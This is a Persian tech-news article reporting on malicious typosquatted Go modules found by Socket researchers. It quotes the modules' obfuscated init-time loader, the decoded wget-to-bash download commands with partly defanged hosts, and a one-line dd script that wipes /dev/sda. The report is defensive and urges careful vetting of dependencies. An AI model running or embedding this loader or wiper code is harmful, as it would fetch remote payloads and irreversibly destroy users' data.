• صفحه اصلی
  • همه اخبار
  • تبلیغات تکناک
  • درباره ما
  • تماس با ما
اخبار تکنولوژی روز جهان و ایران
  • فناوری
    • اخبار هوش مصنوعی
    • رباتیک
    • اینترنت و شبکه
    • شبکه های اجتماعی
    • هوافضا
    • معماری
    • ورزش
    • رویداد ها
    • دوربین دیجیتال
  • کامپیوتر و موبایل
    • موبایل و تبلت
    • لپ تاپ و کامپیوتر
    • اپلیکیشن موبایل
    • نرم افزار
    • سخت افزار
    • ساعت هوشمند
    • مانیتور
    • اسپیکر و هدفون
    • سیستم عامل موبایل
    • سیستم عامل کامپیوتر
  • نقد و بررسی
    • بررسی موبایل و تبلت
    • کنسول بازی
    • بررسی لپ تاپ و کامپیوتر
    • قطعات کامپیوتر
    • نرم افزار
    • بررسی اسپیکر و هدفون
    • بررسی ساعت هوشمند
  • آموزش
    • سیستم عامل موبایل
    • سیستم عامل کامپیوتر
    • آموزش هوش مصنوعی
    • سخت افزار
  • اخبار ارز دیجیتال
    • قیمت لحظه ای ارز دیجیتال
    • ماشین حساب ارز دیجیتال
    • آموزش ارز دیجیتال
  • علمی
    • سلامت و پزشکی
    • انرژی
    • فیزیک
    • شیمی
    • نجوم
    • ورزش
    • محیط زیست
    • باستان شناسی
  • کسب و کار
    • شرکت ها
    • بورس
    • مدیریت(پروژه، کسب و کار، منابع انسانی)
    • استارتاپ ها
    • دولت الکترونیک
    • رویداد کسب و کار
  • وسائل نقلیه
    • خودرو
    • دوچرخه
    • موتور سیکلت
    • قطار
    • هواپیما
  • بازی و سرگرمی
    • کنسول بازی های کامپیوتری
    • بازی های کامپیوتر
    • بازی کنسول
    • بازی موبایل
    • فیلم و سریال
  • چند رسانه ای
    • عکس
    • ویدئو
  • اخبار داخلی
    • دانش بنیان
    • دولت الکترونیک
    • رویداد داخلی
    • بازار
    • دانشگاه
No Result
مشاهده تمامی نتایج
اخبار تکنولوژی روز جهان و ایران
  • فناوری
    • اخبار هوش مصنوعی
    • رباتیک
    • اینترنت و شبکه
    • شبکه های اجتماعی
    • هوافضا
    • معماری
    • ورزش
    • رویداد ها
    • دوربین دیجیتال
  • کامپیوتر و موبایل
    • موبایل و تبلت
    • لپ تاپ و کامپیوتر
    • اپلیکیشن موبایل
    • نرم افزار
    • سخت افزار
    • ساعت هوشمند
    • مانیتور
    • اسپیکر و هدفون
    • سیستم عامل موبایل
    • سیستم عامل کامپیوتر
  • نقد و بررسی
    • بررسی موبایل و تبلت
    • کنسول بازی
    • بررسی لپ تاپ و کامپیوتر
    • قطعات کامپیوتر
    • نرم افزار
    • بررسی اسپیکر و هدفون
    • بررسی ساعت هوشمند
  • آموزش
    • سیستم عامل موبایل
    • سیستم عامل کامپیوتر
    • آموزش هوش مصنوعی
    • سخت افزار
  • اخبار ارز دیجیتال
    • قیمت لحظه ای ارز دیجیتال
    • ماشین حساب ارز دیجیتال
    • آموزش ارز دیجیتال
  • علمی
    • سلامت و پزشکی
    • انرژی
    • فیزیک
    • شیمی
    • نجوم
    • ورزش
    • محیط زیست
    • باستان شناسی
  • کسب و کار
    • شرکت ها
    • بورس
    • مدیریت(پروژه، کسب و کار، منابع انسانی)
    • استارتاپ ها
    • دولت الکترونیک
    • رویداد کسب و کار
  • وسائل نقلیه
    • خودرو
    • دوچرخه
    • موتور سیکلت
    • قطار
    • هواپیما
  • بازی و سرگرمی
    • کنسول بازی های کامپیوتری
    • بازی های کامپیوتر
    • بازی کنسول
    • بازی موبایل
    • فیلم و سریال
  • چند رسانه ای
    • عکس
    • ویدئو
  • اخبار داخلی
    • دانش بنیان
    • دولت الکترونیک
    • رویداد داخلی
    • بازار
    • دانشگاه
No Result
مشاهده تمامی نتایج
اخبار تکنولوژی روز جهان و ایران
تک ناک کامپیوتر و موبایل

کشف ماژول‌های مخرب Go با قابلیت پاک‌سازی کامل اطلاعات

امیرحسین یونس نوشته شده توسط امیرحسین یونس
جمعه 12 اردیبهشت 1404 - 23:20
در کامپیوتر و موبایل, نرم افزار
کشف ماژول‌های Go باقابلیت پاک‌سازی کامل اطلاعات
کپی لینکاشتراک گذاری در تلگراماشتراک گذاری در توییتر

تیم تحقیقاتی Socket در گزارش جدید خود از شناسایی ماژول‌های مخربی خبر داده که به‌طور خاص به سیستم‌های کاربران حمله کرده و هارد دیسک آن‌ها را به‌طور کامل پاک می‌کنند. این حملات از طریق ماژول‌های برنامه‌نویسی زبان Go انجام می‌شود که کدهایی را شامل می‌شوند که باعث تخریب کامل داده‌های سیستم می‌شوند.

به گزارش تکناک، اگر با زبان Go آشنا نیستید، باید بگوییم که Go یک زبان برنامه‌نویسی کامپایل‌شده است که توسط گوگل طراحی شده است. این زبان به‌دلیل پشتیبانی قوی از هم‌زمانی (انجام چندین کار هم‌زمان) و عملکرد خوبش محبوب است.

علاوه بر این، Go به فایل‌های اجرایی واحد کامپایل می‌شود که استقرار برنامه‌ها را بسیار ساده می‌کند. توسعه‌دهندگان اغلب Go را به‌دلیل خوانایی آسان و قابلیت استفاده بالا دوست دارند که این عامل به محبوبیت آن افزوده است.

نئووین می‌نویسد که اکوسیستم Go بسیار وسیع و باز است و ماژول‌های زیادی از مخازن عمومی مانند GitHub در دسترس هستند. دسترسی آسان به این ماژول‌ها و قابلیت دریافت کد به‌طور مستقیم از مخازن جذاب است، اما این ساختار خود چالش‌های امنیتی جدی ایجاد می‌کند. هیچ مرجع مرکزی وجود ندارد که قبل از قرار گرفتن ماژول‌ها برای استفاده در دسترس توسعه‌دهندگان، آن‌ها را بررسی کند.

این به این معنی است که توسعه‌دهندگان اغلب با ماژول‌های مشابه در GitHub مواجه می‌شوند که از نظر نام مشابه هستند اما توسط افراد مختلف ایجاد شده‌اند و این امر تشخیص اینکه کدام ماژول معتبر است را دشوار می‌کند.

این محیط بدون مرجع مرکزی و استاندارد نام‌گذاری واضح، آسیب‌پذیری زیادی در برابر تکنیک‌های typosquatting دارد. در این تکنیک، مهاجمان ماژول‌های مخربی با نام‌هایی مشابه با ماژول‌های معتبر ثبت می‌کنند تا در نگاه اول قابل اعتماد به‌نظر برسند و احتمال اینکه توسعه‌دهندگان به‌طور تصادفی کدهای مخرب را در پروژه‌های خود بگنجانند، افزایش یابد.

چنین تهدیدهایی در ماه گذشته نیز مشاهده شد، زمانی که تیم Socket سه ماژول مخرب Go را شناسایی کرد که از روش‌های مشابهی برای پنهان کردن ماهیت خود استفاده می‌کردند.

این ماژول‌ها به‌شرح زیر شناسایی شدند:

  • github[.]com/truthfulpharm/prototransform
  • github[.]com/blankloggia/go-mcp
  • github[.]com/steelpoor/tlsproxy

اگرچه این ماژول‌ها معمولی به‌نظر می‌رسیدند، اما کدی را شامل می‌شدند که به‌طور خاص برای برقراری ارتباط و دانلود برنامه‌های مخرب جهت اجرا بر روی دستگاه قربانی طراحی شده بود. اسکنرهای امنیتی Socket این اقدامات مشکوک را شناسایی کردند که تحقیقات دقیق‌تر را در پی داشت و دامنه کامل حمله فاش شد.

مهاجمان از یک ترفند هوشمندانه برای پخش قسمت‌هایی از دستورات در داخل آرایه‌ای از رشته‌ها استفاده کردند و سپس آن‌ها را به‌طور پویا بازسازی کردند. این روش، که به‌نام obfuscation مبتنی بر آرایه‌های رشته‌ای شناخته می‌شود، روشی است برای سخت‌تر کردن شناسایی کد مخرب از طریق جستجوهای ساده با کلمات کلیدی.

Go یک زبان برنامه‌نویسی کامپایل‌شده

در اینجا نمونه‌ای از کد obfuscated در یکی از ماژول‌ها، truthfulpharm/prototransform، آورده شده است:

func eGtROk() error {
DmM := []string{"4", "/", " ", "e", "/", "g", "d", "3", "6", " ", "4", "w", "/", "7", "d", ".", "O", " ", "s", "b", "5", "3", "/", "c", "t", "0", "4", "c", "h", " ", "f", "a", "t", "/", "i", "/", "1", "b", "n", "p", "t", "7", "d", "-", "&", ":", "4", "e", "t", "4", "-", "d", "4", "g", "o", "d", "s", "e", "r", "7", ".", "/", "|", ".", " ", "1", "h", " "}
pBRPhsxN := runtime.GOOS == "linux"
bcbGOM := "/bin/sh"
vpqIU := "-c"
PWcf := DmM[11] + DmM[5] + DmM[47] + DmM[32] + DmM[29] + DmM[50] + DmM[16] + DmM[2] + DmM[43] + DmM[17] + DmM[66] + DmM[24] + DmM[40] + DmM[39] + DmM[45] + DmM[12] + DmM[4] + DmM[36] + DmM[49] + DmM[13] + DmM[15] + DmM[46] + DmM[20] + DmM[63] + DmM[0] + DmM[26] + DmM[60] + DmM[52] + DmM[65] + DmM[22] + DmM[56] + DmM[48] + DmM[54] + DmM[58] + DmM[31] + DmM[53] + DmM[3] + DmM[35] + DmM[51] + DmM[57] + DmM[7] + DmM[59] + DmM[21] + DmM[14] + DmM[25] + DmM[55] + DmM[30] + DmM[33] + DmM[23] + DmM[27] + DmM[42] + DmM[41] + DmM[19] + DmM[10] + DmM[8] + DmM[6] + DmM[67] + DmM[62] + DmM[9] + DmM[1] + DmM[37] + DmM[34] + DmM[38] + DmM[61] + DmM[18] + DmM[28] + DmM[64] + DmM[44]
if pBRPhsxN {
exec.Command(bcbGOM, vpqIU, PWcf).Start()
}

return nil
}

var GEeEQNj = eGtROk()

این اسکریپت ابتدا بررسی می‌کند که آیا کد روی یک سیستم لینوکس در حال اجرا است یا خیر. اگر چنین باشد، دستوری را با استفاده از قطعات موجود در آن آرایه رشته‌ای می‌سازد. این دستور سپس به شل سیستم داده می‌شود تا اجرا شود. از آنجا که این کد سیستم‌عامل را بررسی می‌کند، این حمله به‌طور خاص به سیستم‌های توسعه‌دهندگان یا سرورهای لینوکس هدف‌گذاری کرده است.

زمانی که آن رشته‌های درهم ریخته دوباره کنار هم قرار گرفتند، دستور تشکیل‌شده یک دستور ساده برای دانلود و اجرای اسکریپت به‌طور مستقیم بود:

# prototransform module payload
wget -O - [.]website/storage/de373d0df/a31546bf | /bin/bash &

# go-mcp module payload
wget -O - [.]icu/storage/de373d0df/a31546bf | /bin/bash &

# tlsproxy module payload
wget -O - [.]41/storage/de373d0df/ccd7b46d | /bin/sh &

این دستورات به سیستم می‌گویند که یک فایل از یک آدرس وب از راه دور با استفاده از wget بارگیری کرده و سپس بلافاصله محتوای آن فایل را به شل /bin/bash یا /bin/sh وارد کند تا آن را اجرا کند. این اتفاق به‌طور فوری رخ می‌دهد و فایل به‌طور استاندارد ذخیره نمی‌شود که این امر تجزیه و تحلیل یا مداخله پیش از انجام آسیب را دشوار می‌سازد.

آنچه که این حمله را به‌ویژه ویرانگر کرد، اسکریپتی بود که این دستورات دانلود و اجرا می‌کردند. این اسکریپت اغلب با نام done.sh شناخته می‌شد و فقط یک خط داشت که سرنوشت سیستم را تعیین می‌کرد:

#!/bin/bash
dd if=/dev/zero of=/dev/sda bs=1M conv=fsync
sync

این دستور از ابزار dd در لینوکس استفاده می‌کند. این دستور به dd می‌گوید که داده‌ها را از /dev/zero (یک منبع خاص سیستم که همیشه بایت‌های صفر را فراهم می‌کند) کپی کرده و آن‌ها را مستقیماً بر روی /dev/sda بنویسد. در بیشتر سیستم‌های لینوکس، /dev/sda نمایانگر هارد دیسک اصلی است که سیستم‌عامل در آن قرار دارد، همراه با هر داده‌ای که کاربر ذخیره کرده است – فایل‌ها، برنامه‌ها، همه چیز.

با نوشتن صفرهای بی‌پایان روی /dev/sda، این دستور تمام اطلاعات را از بین می‌برد و به‌طور غیرقابل بازگشتی داده‌ها را پاک می‌کند. نتیجه نهایی ویرانی کامل است. ساختار فایل سیستم نابود می‌شود، سیستم‌عامل حذف می‌شود و تمام داده‌ها برای همیشه از بین می‌روند. این یعنی تمام کارها متوقف می‌شود و علاوه بر مشکلات فنی، هزینه‌های بالای پاک‌سازی و آسیب به شهرت شرکت‌ها به همراه خواهد داشت.

برای حفاظت از خود در برابر این حملات، باید با دقت هر کدی که به پروژه خود اضافه می‌کنید، بررسی کنید. فقط به‌دلیل اینکه یک ماژول نام خوبی دارد یا در GitHub است، به آن اعتماد نکنید. باید از ابزارهای خودکار برای اسکن کد این کتابخانه‌ها استفاده کنید تا آسیب‌پذیری‌های شناخته‌شده و الگوهای مشکوک شناسایی شوند.

امیرحسین یونس

امیرحسین یونس

کارشناس ارشد محیط زیست، نویسنده حوزه تکنولوژی

مطالب مرتبط

تاخیر در رونمایی از مک‌بوک-آی‌پد تاشوی اپل تا سال ۲۰۲۷
کامپیوتر و موبایل

تاخیر در رونمایی از مک‌بوک-آی‌پد تاشوی اپل تا سال ۲۰۲۷

نوشته شده توسط سید محمد برازنده
14 مرداد 1404
قابلیت جدید «چت مهمان» واتساپ بدون نیاز به نصب اپلیکیشن
اپلیکیشن موبایل

قابلیت جدید «چت مهمان» واتساپ بدون نیاز به نصب اپلیکیشن

نوشته شده توسط سید محمد برازنده
14 مرداد 1404
تمسخر Apple Intelligence توسط گوگل در تبلیغ جدید پیکسل ۱۰
کامپیوتر و موبایل

تمسخر Apple Intelligence توسط گوگل در تبلیغ جدید پیکسل ۱۰

نوشته شده توسط امیرحسین یونس
13 مرداد 1404
رقابت استارت‌آپ Bolt Graphics با غول‌های گرافیکی جهان؛ ادعای عملکرد ۱۳ برابری نسبت به RTX 5090
سخت افزار

معرفی تراشه Zeus Bolt Graphics با ادعای عملکرد ۱۳ برابری نسبت به RTX 5090

نوشته شده توسط امیرحسین یونس
13 مرداد 1404
رابط کاربری One UI 8 برای این گوشی‌ها و تبلت‌های سامسونگ عرضه شد
پیشنهاد سردبیر

رابط کاربری One UI 8 برای این گوشی‌ها و تبلت‌های سامسونگ منتشر شد

نوشته شده توسط امیرحسین یونس
13 مرداد 1404
خبر بعدی
رونمایی از Ulefone Armor X32؛ گوشی مقاوم اقتصادی با دوربین دید در شب

گوشی Ulefone Armor X32 با دوربین دید در شب معرفی شد

دیدگاهتان را بنویسید لغو پاسخ

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

آذرآنلاین آذرآنلاین آذرآنلاین

پیشنهادی

آیا دنیا با یک موج تنهایی رو به رو است؟

آیا دنیا با یک موج تنهایی روبرو است؟

30 تیر 1404
گلکسی S25 FE با شارژ سریع‌تر و ویژگی‌های ارتقایافته در راه است

سامسونگ به‌دنبال فتح بازار میان‌رده‌ها با گلکسی S25 FE

24 تیر 1404

داغ‌ترین‌های روز

آزمایش موفق موشک پدافند هوایی ASTER

آزمایش موفق موشک پدافند هوایی ASTER

12 مرداد 1404
بهترین گوشی های بازار

بهترین گوشی‌ های بازار ایران در مرداد ۱۴۰۴

12 مرداد 1404
بهترین جنگنده‌های ناونشین جهان در سال ۲۰۲۵؛ مقایسه جامع و فنی

بهترین جنگنده‌های ناونشین جهان در سال ۲۰۲۵

12 مرداد 1404
رابط کاربری One UI 8 برای این گوشی‌ها و تبلت‌های سامسونگ عرضه شد

رابط کاربری One UI 8 برای این گوشی‌ها و تبلت‌های سامسونگ منتشر شد

13 مرداد 1404
گلکسی S25 FE

گلکسی S25 FE با رنگ‌های جدید و مشخصات قوی‌تر رونمایی می‌شود

13 مرداد 1404
تک ناک - اخبار تکنولوژی روز جهان و ایران

دنیا با سرعتی خیره کننده به سمت تحقق رویاهایی می رود که تا دیروز دست نیافتنی و محال بود و بشر با گذر از دریایی از موانع یک به یک در حال تحقق آنها است.

ما در” تک ناک” تلاش می کنیم سهمی از انعکاس تحولات بی شمار فناوری و اخبار تکنولوژی داشته باشیم و در این کهکشان بی انتهای یافته های علمی و دانش محور محتوایی قابل اتکاء و اخباری موثق را از گوشه و کنار دنیا در اختیار علاقمندان و مخاطبان خود قرار دهیم.

ما را در شبکه های اجتماعی دنبال کنید

تازه‌ها

افت کیفیت اینترنت

وزیر ارتباطات خبر داد: افت کیفیت اینترنت درپی اختلال برق و GPS

14 مرداد 1404
چرخش زمین در تابستان امسال سریع تر از همیشه بوده است

چرخش زمین در تابستان امسال سریع تر از همیشه بوده است

14 مرداد 1404
این پهپاد ژاپنی با الهام از شاهین، روی دست انسان فرود می آید

این پهپاد ژاپنی با الهام از شاهین، روی دست انسان فرود می آید

14 مرداد 1404
کوین‌بیس و پی‌پال با وجود قانون جنیوس همچنان روی استیبل‌کوین‌ها سود می‌پردازند

کوین‌بیس و پی‌پال با وجود قانون جنیوس همچنان روی استیبل‌کوین‌ها سود می‌پردازند

14 مرداد 1404

دسترسی سریع

  • فناوری
  • کامپیوتر و موبایل
  • نقد و بررسی
  • آموزش
  • ارز دیجیتال
  • علمی
  • کسب و کار
  • وسائل نقلیه
  • بازی و سرگرمی
  • چند رسانه ای
  • صفحه اصلی
  • همه اخبار
  • تبلیغات تکناک
  • درباره ما
  • تماس با ما

© Copyright 2025 Technoc.ir

technoc-instagram
No Result
مشاهده تمامی نتایج
  • فناوری
    • اخبار هوش مصنوعی
    • رباتیک
    • اینترنت و شبکه
    • شبکه های اجتماعی
    • هوافضا
    • معماری
    • ورزش
    • رویداد ها
    • دوربین دیجیتال
  • کامپیوتر و موبایل
    • موبایل و تبلت
    • لپ تاپ و کامپیوتر
    • اپلیکیشن موبایل
    • نرم افزار
    • سخت افزار
    • ساعت هوشمند
    • مانیتور
    • اسپیکر و هدفون
    • سیستم عامل موبایل
    • سیستم عامل کامپیوتر
  • نقد و بررسی
    • بررسی موبایل و تبلت
    • کنسول بازی
    • بررسی لپ تاپ و کامپیوتر
    • قطعات کامپیوتر
    • نرم افزار
    • بررسی اسپیکر و هدفون
    • بررسی ساعت هوشمند
  • آموزش
    • سیستم عامل موبایل
    • سیستم عامل کامپیوتر
    • آموزش هوش مصنوعی
    • سخت افزار
  • اخبار ارز دیجیتال
    • قیمت لحظه ای ارز دیجیتال
    • ماشین حساب ارز دیجیتال
    • آموزش ارز دیجیتال
  • علمی
    • سلامت و پزشکی
    • انرژی
    • فیزیک
    • شیمی
    • نجوم
    • ورزش
    • محیط زیست
    • باستان شناسی
  • کسب و کار
    • شرکت ها
    • بورس
    • مدیریت(پروژه، کسب و کار، منابع انسانی)
    • استارتاپ ها
    • دولت الکترونیک
    • رویداد کسب و کار
  • وسائل نقلیه
    • خودرو
    • دوچرخه
    • موتور سیکلت
    • قطار
    • هواپیما
  • بازی و سرگرمی
    • کنسول بازی های کامپیوتری
    • بازی های کامپیوتر
    • بازی کنسول
    • بازی موبایل
    • فیلم و سریال
  • چند رسانه ای
    • عکس
    • ویدئو
  • اخبار داخلی
    • دانش بنیان
    • دولت الکترونیک
    • رویداد داخلی
    • بازار
    • دانشگاه

© Copyright 2025 Technoc.ir